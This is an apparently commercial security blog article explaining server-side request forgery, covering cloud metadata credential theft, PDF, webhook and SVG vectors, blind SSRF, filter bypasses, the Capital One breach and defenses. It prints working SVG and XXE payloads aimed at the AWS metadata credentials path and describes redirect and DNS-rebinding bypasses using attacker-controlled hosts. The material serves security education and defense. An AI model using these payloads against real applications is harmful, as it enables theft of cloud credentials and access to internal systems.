Server-Side Request Forgery is deceptively simple. You find a feature where the application makes an HTTP request on your behalf, and you convince it to request something it should not. That "something" could be an internal service, a cloud metadata endpoint, or a database admin panel that is firewalled off from the internet but fully accessible from the application server.

SSRF earned its spot on the OWASP Top 10 in 2021 not because of how often it appears, but because of what happens when it does.[1] A single SSRF vulnerability was the initial access vector in the 2019 Capital One breach, which exposed the personal data of over 100 million customers.[2] The attacker used SSRF to reach the AWS Instance Metadata Service (IMDS), obtained temporary IAM credentials, and used those credentials to access S3 buckets containing customer data. The entire attack chain started with one URL parameter that the application fetched without restriction.

This article covers how SSRF works, where we find it, how we exploit it during penetration tests, and what you need to do to prevent it. We will cover classic SSRF, blind SSRF, SSRF through unexpected vectors like PDF generators and webhook systems, and the cloud-specific risks that make SSRF particularly dangerous in modern infrastructure.


How SSRF Works: The Fundamentals

At its core, SSRF is a trust boundary violation. Web applications regularly need to make outbound HTTP requests: fetching a URL to generate a preview, downloading an image for processing, calling a webhook, or communicating with internal microservices. The vulnerability occurs when user-controlled input influences the target of one of these requests.

Consider a feature that generates a thumbnail preview of a URL. The user submits https://example.com, and the server fetches it, renders it, and returns a screenshot. Now the user submits http://169.254.169.254/latest/meta-data/. The server fetches that too, because to the server, it is just another URL. But that URL points to the AWS Instance Metadata Service, which is only accessible from within the EC2 instance itself, and it returns IAM role credentials, instance identity documents, and other sensitive data.

The critical insight is that the server has a different network position than the user. It can reach internal services, cloud metadata endpoints, and private network ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) that are completely inaccessible from the public internet. SSRF turns the application into an unwitting proxy into the internal network.

Cloud Metadata: The High-Value Target

In cloud environments, SSRF is not just a way to scan internal networks. It is a direct path to credential theft. Every major cloud provider runs a metadata service on a link-local address that is accessible from any instance running in their environment.

AWS Instance Metadata Service (IMDS)

The AWS IMDS at http://169.254.169.254 exposes a tree of instance information. The most dangerous endpoint is /latest/meta-data/iam/security-credentials/[role-name], which returns temporary AWS credentials (access key, secret key, and session token) for the IAM role attached to the instance.[3] With those credentials, an attacker can access any AWS service the role permits: S3 buckets, DynamoDB tables, SQS queues, Lambda functions, and more.

This is exactly what happened in the Capital One breach. The attacker exploited an SSRF in a WAF (Web Application Firewall) reverse proxy to reach the IMDS, retrieved IAM credentials for a role that had excessive S3 permissions, and exfiltrated over 700 S3 buckets worth of customer data.[2]

AWS introduced IMDSv2 in November 2019 as a response. IMDSv2 requires a PUT request to obtain a session token before accessing metadata, which mitigates basic SSRF because most SSRF vectors only allow GET requests.[4] However, IMDSv2 is not enforced by default. Instances must be explicitly configured to require it, and in our experience, a significant number of EC2 instances still allow IMDSv1.

GCP, Azure, and Other Cloud Providers

Google Cloud's metadata service runs at http://metadata.google.internal (also 169.254.169.254) and requires a Metadata-Flavor: Google header. This header requirement provides some protection against basic SSRF, but it can often be bypassed in scenarios where the attacker controls request headers (such as SSRF through an HTTP client library that allows custom headers).[5]

Azure's Instance Metadata Service at http://169.254.169.254/metadata/instance requires a Metadata: true header. Azure also provides an endpoint at http://169.254.169.254/metadata/identity/oauth2/token that returns managed identity access tokens, functionally equivalent to AWS IAM role credentials.

DigitalOcean, Alibaba Cloud, Oracle Cloud, and other providers all have similar metadata services at the same or similar addresses. If you are running in any cloud environment and have an SSRF vulnerability, credential theft is the first thing we test.

The 169.254.169.254 checklist: When we find SSRF, our first request is always to the cloud metadata endpoint. If the target is on AWS and IMDSv1 is enabled, we can typically go from "found SSRF" to "have AWS credentials" in under 60 seconds.

Where We Find SSRF: Common Attack Surfaces

SSRF does not only appear in obvious "fetch this URL" features. Some of the most impactful SSRF vulnerabilities we have found were in functionality that nobody considered an SSRF risk.

URL Preview and Link Unfurling

This is the textbook SSRF vector. Applications that generate rich previews of URLs (like chat applications, project management tools, and social media platforms) need to fetch the URL to extract its title, description, and thumbnail. If the fetch logic does not restrict which URLs can be requested, it is SSRF.

We test this by submitting URLs pointing to our own infrastructure (using Burp Collaborator or a custom listener) and then pivoting to internal addresses. Even if the application does not display the response, the fact that it makes the request is enough for us to confirm the vulnerability and begin probing internal services.

PDF Generation and HTML-to-PDF Conversion

Server-side PDF generation is one of the most overlooked SSRF vectors. Applications using wkhtmltopdf, Puppeteer, WeasyPrint, or similar tools to convert HTML to PDF are particularly vulnerable because these tools render HTML, which means they process external resource references.[6]

If the application allows user-supplied HTML (for invoices, reports, or document templates), we inject references to internal resources:

In one engagement, we found that a SaaS application's invoice generation feature used wkhtmltopdf and allowed custom HTML in the invoice footer field. We injected an iframe pointing to the AWS metadata service, and the resulting PDF contained the full IAM credentials for the application's service role. The role had read access to the production RDS database.

Webhook Functionality

Any application that allows users to configure a webhook URL is potentially vulnerable to SSRF. The application makes HTTP requests to the webhook URL when events occur, and if the URL is not validated against an allowlist, the attacker can point it at internal services.

Webhook SSRF is particularly useful for blind SSRF attacks (which we cover below) because the requests happen asynchronously. We configure the webhook URL to point at various internal addresses and use timing or out-of-band techniques to determine which services responded.

Image and File Processing

Features that download and process images from URLs, such as profile photo imports, image resizing services, or file format converters, are common SSRF vectors. The application fetches the URL to retrieve the image, and that fetch can be redirected to internal services.

A more sophisticated variant involves SVG files. SVG is an XML-based format that supports external entity references and embedded foreign objects. Uploading an SVG file with an external reference to an internal URL can trigger SSRF during server-side rendering:

<svg xmlns="http://www.w3.org/2000/svg"><image href="http://169.254.169.254/latest/meta-data/iam/security-credentials/" /></svg>

XML Parsing (XXE as SSRF)

XML External Entity (XXE) injection is technically its own vulnerability class, but it frequently serves as an SSRF vector. If the application parses XML input with external entity processing enabled, an attacker can define an entity that references an internal URL, and the XML parser will fetch it.[7]

This appears in SOAP APIs, XML file uploads (DOCX, XLSX, and SVG files are all XML-based), and any endpoint that accepts XML input. The classic XXE payload for SSRF is:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><root>&xxe;</root>

Blind SSRF: When You Cannot See the Response

In many SSRF scenarios, the application does not return the server's response to the attacker. The application might fetch the URL internally but only display a "Success" or "Failed" message. This is blind SSRF, and it is still exploitable.

Out-of-Band Detection

The first step is confirming the vulnerability exists. We use Burp Collaborator or a custom DNS and HTTP listener to detect when the server makes an outbound request.[8] If we submit http://[unique-id].oastify.com as the URL and receive a DNS lookup or HTTP request at our listener, we have confirmed SSRF even though we never see the response content.

Internal Port Scanning

Even without seeing response content, we can determine which internal services are running by measuring response times and status codes. A request to http://10.0.0.5:22 (SSH) might time out differently than a request to http://10.0.0.5:80 (HTTP) or http://10.0.0.5:9999 (nothing listening). By scanning common ports across internal IP ranges, we build a map of the internal network through the SSRF vulnerability.

Exploiting Blind SSRF for Impact

Blind SSRF becomes high-impact when internal services perform actions based on receiving a request, regardless of who reads the response. Examples include:

Bypassing SSRF Protections

Many applications implement some form of URL validation to prevent SSRF. In our experience, these protections are almost always bypassable. Here are the techniques we use.

IP Address Obfuscation

If the application blocks requests to 169.254.169.254, we try alternative representations of the same IP address:

DNS Rebinding

DNS rebinding attacks exploit the gap between when the application validates the URL and when it fetches it. Here is the process:

  1. We register a domain (say, rebind.attacker.com) and configure its DNS to alternate between resolving to a public IP (which passes validation) and an internal IP (which is the actual target).
  2. We submit http://rebind.attacker.com to the SSRF endpoint.
  3. The application resolves the domain, gets the public IP, and passes validation.
  4. The application then makes the actual HTTP request. If DNS has been re-resolved (or if the TTL was set to 0), it now resolves to the internal IP.

Tools like rbndr.us provide easy-to-use DNS rebinding services for testing.[9] We also use custom DNS servers that alternate responses between public and private addresses with zero TTL.

Redirect-Based Bypass

If the application validates the URL but follows redirects, we can host a redirect on an allowed domain that points to an internal address. The application validates https://attacker.com/redirect (external, allowed), fetches it, receives a 302 redirect to http://169.254.169.254/latest/meta-data/, and follows the redirect to the internal service.

We set up a simple redirect server for this purpose. A one-line Python server or a DNS wildcard entry that resolves to 127.0.0.1 is often sufficient.

URL Parser Inconsistencies

Different URL parsers handle edge cases differently. If the application validates the URL with one parser and fetches it with another, inconsistencies can be exploited:

Real-World Impact: Lessons from Major Breaches

Capital One (2019)

The Capital One breach remains the most significant SSRF-driven incident in history. Paige Thompson exploited an SSRF vulnerability in a misconfigured WAF (a reverse proxy running on EC2) to access the AWS metadata service. The WAF had an IAM role with broad S3 access, and the SSRF allowed retrieval of the role's temporary credentials. The result was unauthorized access to 106 million customer records, including Social Security numbers and bank account numbers. Capital One was fined $80 million by the OCC and settled a class-action lawsuit for $190 million.[2]

GitLab (CVE-2021-22214)

GitLab had an SSRF vulnerability in its webhook functionality that allowed authenticated users to make arbitrary HTTP requests from the GitLab server.[10] Because GitLab instances often run in cloud environments with access to metadata services and internal infrastructure, this vulnerability could be leveraged for credential theft and internal network access. GitLab rated it as a critical severity issue.

Grafana (CVE-2020-13379)

Grafana's avatar feature had an SSRF vulnerability that allowed unauthenticated users to make the Grafana server send HTTP requests to arbitrary URLs. Combined with Grafana's typical deployment inside internal networks with access to monitoring infrastructure, this provided a pivot point into internal services. The vulnerability required no authentication, making it particularly dangerous.

The pattern: Every major SSRF breach follows the same formula. An internet-facing application with SSRF plus a cloud environment with overly permissive IAM roles plus IMDSv1 (or equivalent) equals credential theft and data exfiltration. Break any one of those links and the chain fails.

Defending Against SSRF

Effective SSRF prevention requires defense in depth. No single control is sufficient because, as we demonstrated above, individual protections can usually be bypassed. Here is what we recommend based on what we see working in practice.

Network-Level Controls

Application-Level Controls

Infrastructure-Level Controls


Our SSRF Testing Methodology

When we assess an application for SSRF, we follow a systematic approach that covers both obvious and non-obvious attack surfaces.

Phase 1: Attack Surface Identification

We map every feature where the application makes server-side HTTP requests. This includes obvious features (URL previews, file imports, webhook configurations) and less obvious ones (PDF generation, email sending with custom templates, OAuth integration, API integrations). We also review the application's JavaScript for API calls that include URL parameters.

Phase 2: Validation Testing

For each identified endpoint, we test what URLs are accepted. We start with our Burp Collaborator domain to confirm the application makes outbound requests, then systematically test internal addresses (127.0.0.1, 169.254.169.254, 10.0.0.0/8 ranges), alternative IP representations, and redirect-based bypasses.

Phase 3: Exploitation

When we confirm SSRF, we attempt to:

  1. Access cloud metadata endpoints and retrieve IAM/service account credentials.
  2. Scan internal network ranges to identify running services.
  3. Access internal admin interfaces, databases, and monitoring tools.
  4. Read local files via the file:// scheme (if supported by the HTTP client).
  5. Interact with internal services using protocol smuggling (gopher://, dict://).

Phase 4: Impact Demonstration

For every confirmed SSRF, we document the maximum achievable impact. If we obtain cloud credentials, we enumerate what those credentials can access. If we reach internal services, we document what data or actions are available. This impact assessment is critical for communicating the severity to development and leadership teams.

Sources

  1. OWASP Top 10:2021 - A10 Server-Side Request Forgery - owasp.org
  2. United States Department of Justice - Former Seattle Tech Worker Convicted of Wire Fraud and Computer Intrusions (Capital One breach) - justice.gov
  3. AWS Documentation - Instance Metadata and User Data - docs.aws.amazon.com
  4. AWS Blog - Defense in Depth: Enforcing IMDSv2 - aws.amazon.com
  5. Google Cloud Documentation - Storing and Retrieving Instance Metadata - cloud.google.com
  6. HackTricks - Server Side Request Forgery via PDF Generators - book.hacktricks.xyz
  7. OWASP - XML External Entity (XXE) Processing - owasp.org
  8. PortSwigger - Burp Collaborator Documentation - portswigger.net
  9. DNS Rebinding Attacks Explained - unit42.paloaltonetworks.com
  10. CVE-2021-22214 - GitLab SSRF via Webhook - nvd.nist.gov

Could SSRF Expose Your Internal Network?

We test for SSRF across every attack surface, including the non-obvious ones. Find out if your web application can be used as a gateway to your cloud credentials and internal infrastructure.

Book a Consultation Our Services
-- views
Link copied!
Lorikeet Security

Lorikeet Security Team

Penetration Testing & Cybersecurity Consulting

We've completed 170+ security engagements across web apps, APIs, cloud infrastructure, and AI-generated codebases. Everything we publish here comes from patterns we see in real client work.